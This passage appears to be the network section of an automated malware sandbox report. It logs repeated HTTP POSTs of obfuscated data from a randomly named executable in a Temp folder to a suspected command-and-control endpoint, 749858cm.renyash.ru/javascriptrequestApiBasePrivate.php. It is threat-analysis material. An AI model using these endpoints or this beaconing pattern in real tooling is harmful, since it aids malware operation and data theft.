cfL4;desc="?proto=TCP&rtt=4913&min_rtt=2066&rtt_var=6470&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1322&delivery_rate=58759&cwnd=208&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<R@X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
53	192.168.2.4	49933	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:58.235766888 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:08:58.586821079 CET	1060	OUT	Data Raw: 58 5a 43 54 59 5c 54 59 5d 5a 59 53 57 59 5a 55 5a 52 5f 59 51 5d 52 47 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: XZCTY\TY]ZYSWYZUZR_YQ]RG]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y _+/5>-<$ 4]$.7\4^.\ +4&2*)=^"' =8"F"#Y ,
Dec 17, 2024 00:08:59.327972889 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:08:59.572300911 CET	799	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:08:59 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VNrBKkgJUwV8mYCkCFR1GVg%2FdCbGdp9ydifW9OVPR6GO6nnn1cjjGqVFCNh28Hln07TlChNPG3pQe9QURgvWODObTlTbyim8CaAq%2FQy6XRwfQBWkE4pHWeUk00vTdazEcRsSkrE3"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3256a5d8e8c342-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3852&min_rtt=1613&rtt_var=5084&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1350&delivery_rate=74756&cwnd=159&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<R@X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49934	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:08:59.812093973 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:09:00.163755894 CET	1060	OUT	Data Raw: 5d 51 43 53 59 51 54 52 5d 5a 59 53 57 5c 5a 55 5a 54 5f 5c 51 5a 52 47 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: ]QCSYQTR]ZYSW\ZUZT_\QZRG]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y X?!?='$ #%>3#_.?Y+0$"S>Z Q<>"F"#Y
Dec 17, 2024 00:09:00.898370981 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:09:01.135255098 CET	807	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:09:00 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=qxYEul94ydUH3qWwmpGpIhrGHTeeaSp1ui2wVyXDG05zJG9j%2FVi%2BBTX1DKumxpQX1mD6WCCx2mMGf64DoP6M7Q1VUiw9P2aRi2ts%2F5elgkGGGLRl6%2BUvH%2B6qQD6VwPK%2Bg5moxccn"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3256afafe3f791-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4731&min_rtt=1581&rtt_var=6893&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1350&delivery_rate=54514&cwnd=134&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<R@X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	49939	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:09:01.341248989 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1936 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:09:01.695030928 CET	1936	OUT	Data Raw: 5d 50 46 54 5c 58 54 53 5d 5a 59 53 57 5f 5a 5e 5a 56 5f 58 51 5b 52 48 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: ]PFT\XTS]ZYSW_Z^ZV_XQ[RH]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y#+<)?='^3<_%=#]4 ].3^<;(1.=.7';*("F"#Y 4
Dec 17, 2024 00:09:02.428663969 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:09:02.661415100 CET	951	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:09:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=eNDJREhVLRH07obDi8Of1V%2BebpPF0wpuLsZBK2a7jnxHlzuPHeWQDJcIKsagKd23SXJMQ1%2BpmCJA8j0UEaMJFjJNtOlIcVdbzRL4PoG1Ww%2FoOTXdaZByph5IHxp8wfH5G8CvnERM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3256b93edd429a-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=7562&min_rtt=2343&rtt_var=11318&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2226&delivery_rate=33105&cwnd=236&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 0e 1a 39 12 33 3e 2a 5f 20 07 3f 53 2a 2f 38 57 26 33 39 5e 38 2f 20 45 24 30 3e 59 25 32 0f 5e 26 24 3b 17 37 31 24 12 33 57 2c 1e 25 1d 23 5d 01 1b 27 41 33 2e 26 5e 2b 2f 00 1e 33 30 2e 08 26 10 3f 0b 31 24 34 56 25 23 02 0e 22 38 3a 58 2f 22 2a 5a 28 11 06 05 2c 20 3a 03 20 3e 21 52 0d 13 22 18 33 06 29 07 27 0f 15 5d 20 1d 2f 58 22 0a 09 53 30 12 3b 18 26 3a 3f 05 24 3c 29 00 26 01 2f 14 3d 06 2a 52 23 1c 20 57 2a 3e 20 52 2c 05 20 50 04 35 54 53 0d 0a 30 0d 0a 0d 0a Data Ascii: 9893>_ ?S/8W&39^8/ E$0>Y%2^&$;71$3W,%#]'A3.&^+/30.&?1$4V%#"8:X/"Z(, : >!R"3)'] /X"S0;&:?$<)&/=R# W*> R, P5TS0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49940	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:09:01.453212023 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:09:01.804605961 CET	1060	OUT	Data Raw: 5d 57 43 56 59 5c 54 5e 5d 5a 59 53 57 5a 5a 55 5a 52 5f 5b 51 5f 52 46 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: ]WCVY\T^]ZYSWZZUZR_[Q_RF]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y#),>V>=3$<Y$.3\ \#.+$$2>)Z 0>"F"#Y
Dec 17, 2024 00:09:02.540860891 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:09:02.800127029 CET	793	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:09:02 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HXbGZhzVsJCnDuN1fLUlzl7kWe4euPMIj5g9FzgzLEW3KDLS2htAl6hJRwRtC7KGlWTkLGiVWN8r2FIApXc8Qbxj2u58k7AHOfsP0Esxs9uAaDnwQhlHYNucfAhhLxCLEW%2FQT1ou"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3256b9eff718cc-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=2703&min_rtt=1492&rtt_var=2982&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=1350&delivery_rate=130555&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a Data Ascii: 4<R@X
Dec 17, 2024 00:09:02.991908073 CET	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49946	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:09:03.233272076 CET	266	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue
Dec 17, 2024 00:09:03.641971111 CET	1060	OUT	Data Raw: 5d 56 43 51 5c 5f 51 5e 5d 5a 59 53 57 59 5a 52 5a 5e 5f 58 51 5e 52 40 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: ]VCQ\_Q^]ZYSWYZRZ^_XQ^R@]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y#(1>X34^%-/4 ^9:X?,1"==. $8)8"F"#Y ,
Dec 17, 2024 00:09:04.320277929 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:09:04.553252935 CET	806	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:09:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=omHJo6ckkTacGaU2bxdkvM%2BWMjmbV7diOyHYs5X%2BzCt6QCet6ZuZZnqD7%2BceT2sg8ut3YP7imEkSYGhqcW%2BxkHMSDArbjMaNNLgLVVoW1gWGNZi74%2FqJrxpxYQpPsgd4IgOlWEWq"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3256c50dfe4308-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=7195&min_rtt=2092&rtt_var=10992&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1326&delivery_rate=34014&cwnd=227&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<R@X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49951	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:09:04.794711113 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:09:05.148277044 CET	1060	OUT	Data Raw: 5d 55 43 51 59 5f 54 5b 5d 5a 59 53 57 5d 5a 57 5a 50 5f 5a 51 53 52 47 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: ]UCQY_T[]ZYSW]ZWZP_ZQSRG]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y [</"=3#0=+[48:;\(1!.U>%[47'[*8"F"#Y <
Dec 17, 2024 00:09:05.881233931 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:09:06.135813951 CET	808	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:09:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=x4zuklaVTcH%2Fw8%2F9WSoLwGyS2qN3LCEzNHrbJYYpXvMnWXvZvy6xTg40ILTco8z20Q%2BMH%2FMW3oGRf4%2FQuVls41X57KbbrzokpTQOsOQvEtt%2BUsexZHQtl7y5Rjh2Li9sstqgWcgH"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3256cecaa20f93-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=6941&min_rtt=1628&rtt_var=11236&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=1350&delivery_rate=33082&cwnd=167&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<R@X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.4	49953	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:09:06.377172947 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1056 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:09:06.726455927 CET	1056	OUT	Data Raw: 58 52 43 50 59 59 54 58 5d 5a 59 53 57 5b 5a 54 5a 56 5f 58 51 59 52 45 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: XRCPYYTX]ZYSW[ZTZV_XQYRE]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y#?1=3380=^#:?<;V$2!*)7 )"F"#Y (
Dec 17, 2024 00:09:07.476131916 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:09:07.735405922 CET	800	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:09:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=UhQybq0Bj%2Bs9zxbjCLYmDRLnDRxEbuU7X7kkPB0dZF0CI3YyBfpz6M0r%2BboXRRirbbp9kkPn6ixidyT1qGIEwwAXXqGScIFgdsqWaOdDjjNdT1NTpV9GiuFOguXcLxL6qKtCzVHa"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3256d8bb974369-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=3025&min_rtt=1721&rtt_var=3255&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1346&delivery_rate=120065&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<R@X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.4	49957	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:09:07.785954952 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1936 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:09:08.132726908 CET	1936	OUT	Data Raw: 5d 52 46 50 59 5e 54 59 5d 5a 59 53 57 5a 5a 52 5a 54 5f 5a 51 5e 52 41 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: ]RFPY^TY]ZYSWZZRZT_ZQ^RA]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y Z+<.S*-;\08'< .;]?]+%!-)>["$'\=("F"#Y
Dec 17, 2024 00:09:08.871535063 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:09:09.112373114 CET	956	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:09:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=gvDr5ebo3aGMsmc4AjgjfUIJ7n%2FQpylB82xWyVcJQtvwc8oNlKfVDi%2FkojcF3ehG0Vo9%2FeYqPLKGQ7fpnh%2FYnzt%2BEXOfSosNIxTNYdFi7Tqb4E616n2bdfCZ5qYTbs%2FmM1mazuP7"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3256e17fc942b2-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4266&min_rtt=1635&rtt_var=5875&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2226&delivery_rate=64365&cwnd=235&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 39 38 0d 0a 0e 1a 3a 0e 33 3e 36 5f 23 2e 23 53 2a 01 2f 0a 30 30 22 05 2c 59 28 0a 24 23 32 5c 25 0c 0b 59 32 1d 34 07 37 21 24 56 27 21 02 1f 25 0d 23 5d 01 1b 24 18 27 10 08 5f 3f 01 2d 02 30 30 0c 40 24 3e 16 1b 26 24 30 52 26 30 37 54 23 2b 22 59 2c 22 29 05 29 3c 2c 04 2c 20 29 12 34 2e 21 52 0d 13 22 51 30 38 3d 00 24 57 3f 59 21 20 30 02 22 1a 28 0e 27 02 38 0b 32 5c 24 5c 24 2f 36 13 25 2b 23 59 28 38 08 1f 23 1c 09 0f 2b 2e 20 52 2c 05 20 50 04 35 54 53 0d 0a 30 0d 0a 0d 0a Data Ascii: 98:3>6_#.#S*/00",Y($#2\%Y247!$V'!%#]$'_?-00@$>&$0R&07T#+"Y,"))<,, )4.!R"Q08=$W?Y! 0"('82\$\$/6%+#Y(8#+. R, P5TS0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.4	49958	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:09:07.906126022 CET	290	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1056 Expect: 100-continue Connection: Keep-Alive
Dec 17, 2024 00:09:08.257707119 CET	1056	OUT	Data Raw: 5d 52 43 55 59 58 54 59 5d 5a 59 53 57 5b 5a 55 5a 50 5f 59 51 5d 52 43 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: ]RCUYXTY]ZYSW[ZUZP_YQ]RC]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y#<<2U=<3Y$- ":\:\#(;,&1>S*.4Q<)("F"#Y ,
Dec 17, 2024 00:09:09.013562918 CET	25	IN	HTTP/1.1 100 Continue
Dec 17, 2024 00:09:09.274710894 CET	807	IN	HTTP/1.1 200 OK Date: Mon, 16 Dec 2024 23:09:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZBVGil6OW25PMKCuEpfKadXNbGIWWIoMcQyvfrQfZ5Uze8o%2FZ8LlgvA5MnHcsmwEaLOrJJQi%2F60%2FuQDUACSnrMhZS9cIJKBDr7ATpLGweCX%2FV%2F16aS7NiiuaH7h3LdVcWx%2FT61RA"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8f3256e25cfd7cf9-EWR alt-svc: h2=":443"; ma=60 server-timing: cfL4;desc="?proto=TCP&rtt=4499&min_rtt=2061&rtt_var=5650&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=1346&delivery_rate=67686&cwnd=206&unsent_bytes=0&cid=0000000000000000&ts=0&x=0" Data Raw: 34 0d 0a 3c 52 40 58 0d 0a 30 0d 0a 0d 0a Data Ascii: 4<R@X0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.4	49964	104.21.38.84	80	5592	C:\Users\user\AppData\Local\Temp\XxLYuMpEItUOFsDOBvkEQVmYCLNZEM.exe

Timestamp	Bytes transferred	Direction	Data
Dec 17, 2024 00:09:09.521086931 CET	266	OUT	POST /javascriptrequestApiBasePrivate.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0 Host: 749858cm.renyash.ru Content-Length: 1060 Expect: 100-continue
Dec 17, 2024 00:09:09.867181063 CET	1060	OUT	Data Raw: 5d 57 43 56 5c 5f 54 53 5d 5a 59 53 57 5a 5a 5e 5a 54 5f 58 51 5c 52 44 5d 56 58 5c 5b 53 5a 58 58 45 54 58 5e 50 56 52 59 50 56 5e 58 51 5c 58 57 57 5d 49 5f 5b 50 54 55 5e 55 5f 5f 55 51 43 58 5f 44 43 5e 41 56 56 5b 52 5d 53 5a 5d 5c 5e 52 53 Data Ascii: ]WCV\_TS]ZYSWZZ^ZT_XQ\RD]VX\[SZXXETX^PVRYPV^XQ\XWW]I_[PTU^U__UQCX_DC^AVV[R]SZ]\^RS]XU^\]PQ[ZXX^P[\]UZT][ZPA[]^Y[ZCQVZ]XTXV[]\X\X[ZP]QZX_^_VTVZZRV\Y]Q^R]X]F^Z_QY[TYYT_SPU\Z\VYV\^Y_Y^X[Y Y<&V)>,3V#$#]79#:\ (+3$"&S_#4<("F"#Y
Dec 17, 2024 00:09:10.613881111 CET	25	IN	HTTP/1.1 100 Continue
